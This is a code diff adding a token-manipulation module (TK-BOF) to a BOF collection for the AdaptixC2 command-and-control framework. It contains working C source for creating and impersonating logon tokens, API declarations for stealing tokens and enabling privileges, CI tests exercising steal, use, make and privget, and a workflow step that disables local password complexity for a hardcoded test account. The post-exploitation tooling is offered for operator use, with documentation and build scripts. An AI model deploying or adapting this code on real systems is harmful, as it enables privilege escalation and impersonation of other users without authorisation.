Tk bof

.github/ci/tasks.yaml

@@ -4,6 +4,50 @@
 
 tasks:
 
+  # ── TK-BOF ──
+
+  # tk-spawn-fixture (D-01, D-02)
+  - cmdline: 'ps run --command "ping -n 999 127.0.0.1"'
+    expected_regex: "Process started: PID \\d+"
+    capture:
+      tk_pid: "Process started: PID (\\d+)"
+
+  # tk-steal-immediate (D-03)
+  - cmdline: "tk steal {{tk_pid}}"
+    expected_regex: "\\[\\+\\] Handle: 0x[0-9a-fA-F]+"
+    not_expected: "error"
+
+  # tk-revert-after-steal (D-03)
+  - cmdline: "tk revert"
+    expected: "[+] Reverted to process token."
+
+  # tk-steal-noapply (D-04)
+  - cmdline: "tk steal {{tk_pid}} --no-apply"
+    expected_regex: "\\[\\+\\] Handle: 0x[0-9a-fA-F]+ \\(impersonation not applied\\)"
+    capture:
+      tk_handle: "Handle: (0x[0-9a-fA-F]+)"
+
+  # tk-use (D-04)
+  - cmdline: "tk use {{tk_handle}}"
+    expected_regex: "\\[\\+\\] Impersonating handle 0x[0-9a-fA-F]+"
+
+  # tk-rm (D-04)
+  - cmdline: "tk rm {{tk_handle}}"
+    expected_regex: "\\[\\+\\] Handle 0x[0-9a-fA-F]+ closed\\."
+
+  # tk-make (D-08)
+  - cmdline: "tk make --username tk_test --password Tk_Test_Pass1!"
+    expected_regex: "\\[\\+\\] Handle: 0x[0-9a-fA-F]+"
+    not_expected: "error"
+
+  # tk-revert-after-make (D-09)
+  - cmdline: "tk revert"
+    expected: "[+] Reverted to process token."
+
+  # tk-privget (D-10)
+  - cmdline: "tk privget"
+    not_expected: "error"
+
   # ── TYPE ──
 
   # type-happy-path

.github/workflows/test.yaml

@@ -51,6 +51,26 @@ jobs:
             Set-LocalUser $env:CI_USER -Password $pass
           }
 
+      - name: Create tk_test user
+        shell: powershell
+        run: |
+          # Relax local password policy so the hardcoded test credential is accepted
+          # on runners with non-default minimum-length or complexity settings.
+          $cfgPath = "$env:TEMP\secpol.cfg"
+          secedit /export /cfg $cfgPath /quiet
+          (Get-Content $cfgPath) `
+            -replace 'PasswordComplexity\s*=\s*1', 'PasswordComplexity = 0' `
+            -replace 'MinimumPasswordLength\s*=\s*\d+', 'MinimumPasswordLength = 0' |
+            Set-Content $cfgPath
+          secedit /configure /db "$env:windir\security\local.sdb" /cfg $cfgPath /areas SECURITYPOLICY /quiet
+          Remove-Item $cfgPath -Force -ErrorAction SilentlyContinue
+          $pass = ConvertTo-SecureString 'Tk_Test_Pass1!' -AsPlainText -Force
+          if (-not (Get-LocalUser tk_test -ErrorAction SilentlyContinue)) {
+            New-LocalUser tk_test -Password $pass -PasswordNeverExpires
+          } else {
+            Set-LocalUser tk_test -Password $pass
+          }
+
       - name: Start OpenSSH Server with password auth
         shell: powershell
         run: |
@@ -267,6 +287,9 @@ jobs:
               mkdir -p /tmp/adaptixc2/dist/BOF-Collection/PS-BOF/_bin
               cp /workspace/PS-BOF/_bin/*.o /tmp/adaptixc2/dist/BOF-Collection/PS-BOF/_bin/
               cp /workspace/PS-BOF/ps.axs /tmp/adaptixc2/dist/BOF-Collection/PS-BOF/
+              mkdir -p /tmp/adaptixc2/dist/BOF-Collection/TK-BOF/_bin
+              cp /workspace/TK-BOF/_bin/*.o /tmp/adaptixc2/dist/BOF-Collection/TK-BOF/_bin/
+              cp /workspace/TK-BOF/tk.axs /tmp/adaptixc2/dist/BOF-Collection/TK-BOF/
               cp /workspace/bof-collection.axs /tmp/adaptixc2/dist/BOF-Collection/
 
               # ── Build verification ───────────────────────────────────────
@@ -283,6 +306,12 @@ jobs:
               count=$(ls /tmp/adaptixc2/dist/BOF-Collection/PS-BOF/_bin/*.x64.o | wc -l)
               [ "$count" -eq 6 ] && echo "✓ All 6 PS-BOF x64 objects deployed to container" || \
                 { echo "✗ Expected 6 PS-BOF x64 objects in container bin, got $count"; exit 1; }
+              count=$(ls /workspace/TK-BOF/_bin/*.x64.o | wc -l)
+              [ "$count" -eq 6 ] && echo "✓ All 6 TK-BOF x64 objects compiled" || \
+                { echo "✗ Expected 6 TK-BOF x64 objects, got $count"; exit 1; }
+              count=$(ls /tmp/adaptixc2/dist/BOF-Collection/TK-BOF/_bin/*.x64.o | wc -l)
+              [ "$count" -eq 6 ] && echo "✓ All 6 TK-BOF x64 objects deployed to container" || \
+                { echo "✗ Expected 6 TK-BOF x64 objects in container bin, got $count"; exit 1; }
               echo "=== Build verification passed ==="
 
               uv tool install --reinstall "git+https://github.com/TheGr3atJosh/Testing-Kit@c53a47d"

Makefile

@@ -1,4 +1,4 @@
-SUBDIRS := FS-BOF Exit-BOF PS-BOF
+SUBDIRS := FS-BOF Exit-BOF TK-BOF PS-BOF
 
 .PHONY: all $(SUBDIRS) clean docker-build
 

README.md

@@ -74,7 +74,20 @@ Process management: ps list, ps kill, ps run, ps grep, ps suspend, ps resume. [M
 |ps suspend|`ps suspend <PID>`|Suspend a process|
 |ps resume|`ps resume <PID>`|Resume a suspended process|
 
+## TK-BOF
+
+Token management: steal, use, make, rm, revert, privget. [More details](TK-BOF/README.md)
+
+|Commands|Usage|Notes|
+|--------|-----|-----|
+|steal|`tk steal <pid>`|Duplicate a process token; optionally skip impersonation with `--no-apply`|
+|use|`tk use <token_handle>`|Impersonate a previously obtained token handle|
+|make|`tk make <username> <password>`|Create a token via LogonUserW; supports `--domain`, `--logon-type`, `--no-apply`|
+|rm|`tk rm <token_handle>`|Close a token handle and free the kernel object|
+|revert|`tk revert`|Drop impersonation and revert to process token|
+|privget|`tk privget`|Enable all privileges on the current token|
+
 ## Credits
 
 - [Extension-Kit](https://github.com/Adaptix-Framework/Extension-Kit): Project structure and README
-- [Kharon](https://github.com/entropy-z/Kharon): PS-BOF command implementations
+- [Kharon](https://github.com/entropy-z/Kharon): PS-BOF and TK-BOF command implementations

TK-BOF/Makefile

@@ -0,0 +1,25 @@
+CC64 = x86_64-w64-mingw32-gcc
+CC86 = i686-w64-mingw32-gcc
+STRIP64 = x86_64-w64-mingw32-strip --strip-unneeded
+STRIP86 = i686-w64-mingw32-strip --strip-unneeded
+CFLAGS = -I . -I ../_include -w -Wno-incompatible-pointer-types -Os -DBOF -c
+
+all: bof
+
+bof: clean
+	@(mkdir _bin 2>/dev/null) && echo 'creating _bin directory' || echo '_bin directory exists'
+	@($(CC64) $(CFLAGS) steal/steal.c -o _bin/steal.x64.o && $(STRIP64) _bin/steal.x64.o) && echo '[+] steal x64' || echo '[!] steal x64'
+	@($(CC86) $(CFLAGS) steal/steal.c -o _bin/steal.x32.o && $(STRIP86) _bin/steal.x32.o) && echo '[+] steal x32' || echo '[!] steal x32'
+	@($(CC64) $(CFLAGS) use/use.c -o _bin/use.x64.o && $(STRIP64) _bin/use.x64.o) && echo '[+] use x64' || echo '[!] use x64'
+	@($(CC86) $(CFLAGS) use/use.c -o _bin/use.x32.o && $(STRIP86) _bin/use.x32.o) && echo '[+] use x32' || echo '[!] use x32'
+	@($(CC64) $(CFLAGS) make/make.c -o _bin/make.x64.o && $(STRIP64) _bin/make.x64.o) && echo '[+] make x64' || echo '[!] make x64'
+	@($(CC86) $(CFLAGS) make/make.c -o _bin/make.x32.o && $(STRIP86) _bin/make.x32.o) && echo '[+] make x32' || echo '[!] make x32'
+	@($(CC64) $(CFLAGS) rm/rm.c -o _bin/rm.x64.o && $(STRIP64) _bin/rm.x64.o) && echo '[+] rm x64' || echo '[!] rm x64'
+	@($(CC86) $(CFLAGS) rm/rm.c -o _bin/rm.x32.o && $(STRIP86) _bin/rm.x32.o) && echo '[+] rm x32' || echo '[!] rm x32'
+	@($(CC64) $(CFLAGS) revert/revert.c -o _bin/revert.x64.o && $(STRIP64) _bin/revert.x64.o) && echo '[+] revert x64' || echo '[!] revert x64'
+	@($(CC86) $(CFLAGS) revert/revert.c -o _bin/revert.x32.o && $(STRIP86) _bin/revert.x32.o) && echo '[+] revert x32' || echo '[!] revert x32'
+	@($(CC64) $(CFLAGS) privget/privget.c -o _bin/privget.x64.o && $(STRIP64) _bin/privget.x64.o) && echo '[+] privget x64' || echo '[!] privget x64'
+	@($(CC86) $(CFLAGS) privget/privget.c -o _bin/privget.x32.o && $(STRIP86) _bin/privget.x32.o) && echo '[+] privget x32' || echo '[!] privget x32'
+
+clean:
+	@(rm -rf _bin)

TK-BOF/README.md

@@ -0,0 +1,72 @@
+# TK-BOF
+
+Token management: steal, use, make, rm, revert, privget
+
+|Commands|Usage|Notes|
+|--------|-----|-----|
+|steal|`tk steal <pid>`|Duplicate a process token; optionally skip impersonation with `--no-apply`|
+|use|`tk use <token_handle>`|Impersonate a previously obtained token handle|
+|make|`tk make <username> <password>`|Create a token via LogonUserW; supports `--domain`, `--logon-type`, `--no-apply`|
+|rm|`tk rm <token_handle>`|Close a token handle and free the kernel object|
+|revert|`tk revert`|Drop impersonation and revert to process token|
+|privget|`tk privget`|Enable all privileges on the current token|
+
+## Handle Lifecycle
+
+tk rm <handle> closes the kernel object — the handle is gone and cannot be reused. tk revert drops impersonation but keeps handles alive — the token can be re-activated with tk use. Always tk rm handles you no longer need to avoid leaking kernel objects in the beacon process.
+
+## steal
+
+Duplicate a process token by PID via OpenProcessToken + DuplicateTokenEx. Impersonation is applied immediately via ImpersonateLoggedOnUser unless --no-apply is passed. The duplicated handle is printed for later reuse with `tk use`.
+
+```
+tk steal <pid>
+tk steal <pid> --no-apply
+```
+
+## use
+
+Impersonate a previously obtained token handle via ImpersonateLoggedOnUser.
+
+```
+tk use <token_handle>
+```
+
+## make
+
+Create a token from plaintext credentials via LogonUserW. Impersonation is applied immediately unless --no-apply is passed. The token handle is printed for later reuse with `tk use`.
+
+```
+tk make <username> <password>
+tk make <username> <password> --domain <domain>
+tk make <username> <password> --logon-type <type>
+tk make <username> <password> --no-apply
+```
+
+## rm
+
+Close a token handle and free the kernel object. The handle is gone after this call and cannot be reused with `tk use`.
+
+```
+tk rm <token_handle>
+```
+
+## revert
+
+Drop impersonation and revert to the process token. Open token handles are not closed; they remain valid and can be reused with `tk use`.
+
+```
+tk revert
+```
+
+## privget
+
+Enable all privileges on the current token by iterating the token's privilege set and calling AdjustTokenPrivileges.
+
+```
+tk privget
+```
+
+## Credits
+
+- [Kharon](https://github.com/entropy-z/Kharon): TK-BOF command implementations

TK-BOF/bofdefs.h

@@ -0,0 +1,40 @@
+#pragma once
+#include "../_include/bofdefs.h"
+#include <windows.h>
+#include <winternl.h>
+
+// =============================================================================
+// ADVAPI32 — token acquisition
+// =============================================================================
+WINBASEAPI BOOL WINAPI ADVAPI32$DuplicateTokenEx(HANDLE hExistingToken, DWORD dwDesiredAccess, LPSECURITY_ATTRIBUTES lpTokenAttributes, SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, TOKEN_TYPE TokenType, PHANDLE phNewToken);
+
+// =============================================================================
+// ADVAPI32 — impersonation
+// =============================================================================
+WINBASEAPI BOOL WINAPI ADVAPI32$ImpersonateLoggedOnUser(HANDLE hToken);
+WINBASEAPI BOOL WINAPI ADVAPI32$RevertToSelf(VOID);
+
+// =============================================================================
+// ADVAPI32 — credential-based token creation
+// =============================================================================
+WINBASEAPI BOOL WINAPI ADVAPI32$LogonUserW(LPCWSTR lpszUsername, LPCWSTR lpszDomain, LPCWSTR lpszPassword, DWORD dwLogonType, DWORD dwLogonProvider, PHANDLE phToken);
+
+// =============================================================================
+// ADVAPI32 — token introspection and modification
+// =============================================================================
+WINBASEAPI BOOL WINAPI ADVAPI32$GetTokenInformation(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength);
+
+// =============================================================================
+// ADVAPI32 — thread token
+// =============================================================================
+WINBASEAPI BOOL WINAPI ADVAPI32$OpenThreadToken(HANDLE ThreadHandle, DWORD DesiredAccess, BOOL OpenAsSelf, PHANDLE TokenHandle);
+
+// =============================================================================
+// KERNEL32 — pseudo-handles
+// =============================================================================
+WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentThread(VOID);
+
+// =============================================================================
+// NTDLL — handle close (rm BOF uses NtClose to close token handle)
+// =============================================================================
+WINBASEAPI NTSTATUS NTAPI NTDLL$NtClose(HANDLE Handle);

TK-BOF/make/make.c

@@ -0,0 +1,58 @@
+#include <windows.h>
+#include "beacon.h"
+#include "bofdefs.h"
+#include "../tkerror.h"
+
+VOID go(IN PCHAR Buffer, IN ULONG Length)
+{
+    datap parser;
+    WCHAR *username = NULL;
+    WCHAR *password = NULL;
+    WCHAR *domain   = NULL;
+    BOOL  no_apply = FALSE;
+    int   logon_type = 0;
+    HANDLE hToken  = NULL;
+    DWORD  dwError = 0;
+    char   errMsg[256];
+
+    BeaconDataParse(&parser, Buffer, Length);
+    username   = (WCHAR*) BeaconDataExtract(&parser, NULL);
+    password   = (WCHAR*) BeaconDataExtract(&parser, NULL);
+    domain     = (WCHAR*) BeaconDataExtract(&parser, NULL);
+    no_apply   = (BOOL) BeaconDataInt(&parser);
+    logon_type = (int)  BeaconDataInt(&parser);
+
+    if (!username || !password)
+    {
+        BeaconPrintf(CALLBACK_ERROR, "[-] make: missing username or password argument\n");
+        return;
+    }
+
+    if (logon_type == 0) logon_type = 9;
+    const WCHAR *dom = (domain && domain[0]) ? domain : L".";
+
+    if (!ADVAPI32$LogonUserW(username, dom, password, (DWORD)logon_type, LOGON32_PROVIDER_DEFAULT, &hToken))
+    {
+        dwError = KERNEL32$GetLastError();
+        TkErrorMessage(dwError, errMsg, sizeof(errMsg));
+        BeaconPrintf(CALLBACK_ERROR, "[-] make: LogonUserW failed: %s\n", errMsg);
+        return;
+    }
+
+    if (!no_apply)
+    {
+        if (!ADVAPI32$ImpersonateLoggedOnUser(hToken))
+        {
+            dwError = KERNEL32$GetLastError();
+            TkErrorMessage(dwError, errMsg, sizeof(errMsg));
+            BeaconPrintf(CALLBACK_ERROR, "[-] make: ImpersonateLoggedOnUser failed: %s\n", errMsg);
+            NTDLL$NtClose(hToken);
+            return;
+        }
+        BeaconPrintf(CALLBACK_OUTPUT, "[+] Handle: 0x%llx\n", (unsigned long long) hToken);
+    }
+    else
+    {
+        BeaconPrintf(CALLBACK_OUTPUT, "[+] Handle: 0x%llx (impersonation not applied)\n", (unsigned long long) hToken);
+    }
+}